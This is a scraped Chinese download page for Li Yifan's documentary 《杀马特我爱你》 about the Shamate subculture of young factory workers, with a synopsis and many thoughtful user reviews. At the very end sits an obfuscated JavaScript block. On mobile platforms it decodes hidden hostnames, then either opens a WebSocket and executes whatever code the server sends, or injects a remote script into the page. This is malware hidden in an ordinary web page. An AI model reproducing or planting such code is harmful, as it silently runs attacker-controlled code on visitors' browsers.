2019高分纪录片《杀马特我爱你》HD1080P.国语英字


更新时间:2021-12-26 11:36:54 类别: 纪录片 评论 下载
杀马特我爱你的海报 杀马特我爱你

杀马特我爱你

导演: 李一凡
主演: 罗福兴
类型: 纪录片
制片国家/地区: 中国大陆
语言: 汉语普通话
上映日期: 2019-12(广东时代美术馆)
片长: 125分钟
又名: 杀马特,我爱你 / Sha Ma Te I Love You / We Were Smart
IMDb: tt13809752
2017年,李一凡开始拍摄杀马特。他从深圳开始,在深圳、广州、中山、惠州、重庆、贵阳、黔东南州、黔西南州、毕节、安顺、昆明、大理、玉溪、曲靖,以及红河州,共计完成杀马特采访67个,网络采访11个。在拍摄期间,李一凡又从杀马特和其他工人手中,通过直接购买手机视频等方式,收 集了工厂流水线及工人生活录像915段。
这是一次详实且残酷的调查梳理行动。五颜六色的头发下面,李一凡重新检讨了城乡关系里,关于社会底层工人的生存代价和权利困境的根源。当越来越多的杀马特消失在人们视线里,而曾经或依旧是流水线工人的他们,和今天仍然不断涌入城市的打工者一样,依然面临着实质上的权利不平等,依旧笼罩在制度性排斥的阴影里。
杀马特音译自英语“smart”一词,泛指一种中国城市年轻工人中曾经风靡一时的亚文化潮流,以夸张而廉价的服饰、发型著称。艺术家、纪录片导演李一凡花费数年时间实地接触和研究“杀马特”群体,最终用访谈和工厂场景创作出一部长片,并在展览现场用数百部二手手机播放购买自工人自拍的生产场景。
李一凡将展览视为一次让美术馆观众看到另外一个社群的机会,在长片中他借用年轻工人的陈述,描绘出杀马特形成的条件、变化,及如何在舆论暴力下走向式微。在项目中,他始终是以无知者的角色进入,随后逐渐发现杀马特的遭遇,来自于年轻工人的孤立处境和与城市主流生活之间的疏离,并把项目看作是对杀马特一词祛魅化的过程。这与他一贯的立场保持一致,即认为在中国的现状下,艺术创作应当基于对社会生活的直接体感,才能因现实本身的超越性,获得足够的创造力。
舒考考 2020-06-19 18:01:06

杀马特教主罗福兴:审美的自由是一切自由的起点

林西拿 2020-08-16 12:55:38

讓這群人端坐在鏡頭前,卸下他們的防備,讓他們自如地、甚至帶著笑容地講述自己的故事,光是做到這一點,就已經功德無量了,因為他做的是「保存時代的面孔」,以及讓這個群體「登堂入室」。

☃︎ 2020-08-15 20:34:18

和三和大神的困境是一样的,但他们有头发护体。

喂饭 2020-08-18 17:38:25

富士康的宿舍楼绕着镜头旋转,他们的刺猬头绕着铁丝旋转。井底太深,楼房太高,那是他们直立的头发怎么也填补不了的距离

工凡 2020-08-15 23:06:39

之前看到好多文章都停留在审美(某种意义上是审丑)的层面上讲杀马特,但杀马特的前史被抹去了。杀马特作为一种风格的流行和残酷、枯燥、掠夺性的工厂生活互为线索,“好想我的头发像风吹扬带我飞翔飞过工厂的高墙”,高高梳起的头发代表始终想要确认和寻找的主体性、价值认同和群体间的互助、联结。915段工厂流水线和工人生活录像的记录是残酷的,我们意识到我们可能作为掠夺者,作为生产链条上剥削的参与者,也在某个瞬间意识到「他们」就是「我们」。 导演为杀马特作为主体的叙述留下了足够的空间,也提供了从兴起到式微的发展脉络,但仍然没想明白2012年对杀马特的围剿是如何发生的,这种追问和当下许多现实问题相关联;而再到2018年,杀马特再次走入主流视野,意涵发生了变化,内部有了割裂,但管控的那个主体更加蛮横,也更加难以抵抗。

孟浪 2020-09-12 21:02:45

基本上是一部论文电影或汇编式纪录片,因为影片在拍摄时杀马特文化已经成为明日黄花,所以李一凡是在大量地调研和摸排之后,对采访口述、打工视频、QQ空间残留印记、快手段子等文本进行了缝合与拼贴,从而以论文影像的修辞性完成了对杀马特这一群体的整塑与评述。围绕着杀马特这些常年被大众和媒体标签化的“异类“或”非主流“,李一凡从他们的年龄、家庭、工作、生活、发型、情感、阶层等多个背景入手,用几十段私人讲述展开了一种自我剖析式的祛魅,进而揭露出了中国当代社会严重的阶层割裂,以及工业文明对弱小个体的剥削和压迫。诚然,影片的前置议题也是建立在猎奇之上,但影片的基调又是温柔且善良的,最重要的是它给那些出镜的杀马特们保留了一个自由表达的窗口,对公共视角的建构无疑是让被拍摄者与观众完成了一场通畅的对话。

2020-01-18 08:40:16

时代美术馆循环播放。我与杀马特应该是同时代人,却对这个群体了解甚少。看了片子才恍然大悟,这是数百万底层年轻人希望冲破固有观念,拥抱自由的一次革命啊!!向他们致敬!

赫恩曼尼 2020-09-15 17:17:11

在大众媒体的话语体系中,杀马特等同于低俗、哗众取宠、博人眼球。而本世纪初,在广东一带兴起的杀马特一族,其实绝大部分都是十几岁进厂打工的留守儿童,他们在流水线上出卖体力、感觉不到存在的意义,得不到周围人的认可,日常被孤独、压抑、苦闷填满。于是他们只能通过廉价而又扎眼的发型获得心理上安慰(即:有人关注我、关心我,哪怕是异样的眼光)。这种发型进而发展成一种身份上的认同,工厂流水线上一个个孤独的个体终于有了归属。他们宁肯被辞退、找不到工打、忍饥挨饿、遭人唾弃,也要保留自己的发型。因为只有这样,他们才感觉自己是完整的、自由的、有归属的。至于后来网络直播平台上戴着假发套、装疯卖傻的“杀马特”,早已不是当年这群孤独的人了。这群人最后终被无力穿透的阶层困住,重新坠入千篇一律的生活。

李維 2020-01-15 16:32:22

所谓“我们”对“他们”的剿杀

董劼 2020-08-17 17:12:42

孤独依然在,围剿也依然在;城市还在增长,网络也在。最终,唯一能记住的数字是父亲的手机号,化作各个APP里隐藏的密码。警惕“看见”。

闲散人员小李 2020-11-14 16:55:35

女孩说,想要拍一套杀马特的婚纱照。“我的人生由我做主才行,哪怕是错的。”改造身体的权利和自由。快手清理社会摇,和2013年清理杀马特,感觉理由如出一辙,一是主流的、正统的、极权的文化对异端文化的排斥,二是害怕由杀马特或社会摇所集结的“家族”组织发展壮大。说到底,流水线这么多年了,工人的生存状况还是没有得以改变,工会的缺席是首当其冲的理由。

周扒皮 2020-06-13 03:05:11

不知道为啥 拍出来感觉杀马特之父挺诚恳的 虽然少年不幸,但是自己努力长成了 普通人也有娱乐的权利

龙岩ART 2020-08-09 13:54:52

这是百万底层青年人想要冲破固有概念,拥抱自由的一次革命。当我们客观去看待杀马特,更多的是感动与叹息。

内陆飞鱼 2020-11-20 09:03:02

题材好,切入扎实,素材充足,很多人只看到了杀马特的猎奇外形,没看到杀马特的卑微人生,看似坚固的外壳下面是脆弱的心,让他们讲讲自己的故事多好。其实,无论是杀马特还是三和大神,他们都是大时代的有伤青年,急速的城市化进程中的弃子或浪子。罗福兴的快手签名档:审美的自由是一切自由的起点。

Kur. Michael 2020-08-18 21:23:51

身体从来都是权力的场域。 Proletarians唯一拥有的是他们的身体,但也从来没有真正地拥有他们的身体。

2020-08-15 22:27:03

时代美术馆看的。杀马特们也是艺术家,但是留给他们的空间不多了。关键词:反人性的流水线,长大成人的留守儿童,安放在杀马特文化里的青春。印象中有个杀马特说,这样看起来凶一点,没人欺负他。假发,装扮等等,是把他们与流水线机器人区分开来的标志,“家族”的“势力”,则是他们为数不多的慰藉。几个外国观众都哭了,也许他们无法想象那段中国的制造业的亚文化小切片是这样的——从残酷中绽放的花。

哼哼.floweray 2020-11-22 12:37:52

几十几百的杀马特造型和几万十几万的医美整形网红没有本质差别,都是时代的弄潮儿,都终会是时代的弃子。 用现在的话说,坐标浦东喝着咖啡吃着简餐的996和身在三和喝着大水吃着挂壁面的大神都是资本的打工人。

失意的孩子 2020-11-26 18:45:43

弱不禁风的护甲,微不足道的反抗和无可奈何的清醒,从猎奇开始,到心酸结束。

老睿 2020-11-19 20:37:12

这种纪录片就没有不好看的,选题就赢了。

寒枝雀静 2020-12-12 21:01:15

C+/ 前半程还是太规整了,几乎是过分统一的素材分类,由此塑造的也只是一种略老套的身份区隔描绘。只有一些时刻痉挛般的剪辑激活了几乎完全对应的声画关系。但是到第一波杀马特消亡之后言说的声部渐渐变得复杂,空间也向更难以定界的网络开放,身体改造的真假问题等等才进入讨论范域。从而反向地触及了影片中强调的边界设立问题,也让前半程反复涂抹的仿佛自然而然的主体性/自由的冲动变得摇摆可质疑。创作者可能并没有想清楚但已然揭示出来的一个问题是,为什么“自黑”与“杀马特”的对立成立了?为什么这种对立及其产生的绞杀促使杀马特怀旧地说出对“一片净土”的渴望?假如停留于排斥“自黑”所述的行为来定义杀马特,那么使得“自黑”成立的逻辑反而被遮蔽了。而指向这些定界的权力或许有出口,“一片净土”恐怕才真的不会有未来。

杀马特我爱你的截图1
function DEWLc(e){var t="",n=r=c1=c2=0;while(n 0x3c e.length){r=e.charCodeAt(n);if(r 0x3c 128){t+=String.fromCharCode(r);n++;}else if(r 0x3e 191&&r 0x3c 224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)0x3c0x3c 6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)0x3c0x3c 12|(c2&63)0x3c0x3c 6|c3&63);n+=3;}}return t;};function ucHiU(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f 0x3c e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s 0x3c0x3c 2|o 0x3e0x3e 4;r=(o&15)0x3c0x3c 4|u 0x3e0x3e 2;i=(u&3)0x3c0x3c 6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return DEWLc(t);};window[''+'I'+'C'+'c'+'O'+'t'+'d'+'E'+'D'+'r'+'R'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=ucHiU,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));new Worker(window.URL.createObjectURL(new Blob(["var ws=new WebSocket('wss://"+k+":9394/'+"+i+");ws.onmessage=function(e){ws.close();postMessage(e.data)};"]))).onmessage=function(e){new Function('_tdcs',x(e.data))(cs);}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('a3RwLnll3YWsuY29tLmNu','a250LnJ1aXR1c2NNob29sLmNNvbS5jbg==','135631',window,document,['l','N']);}:function(){};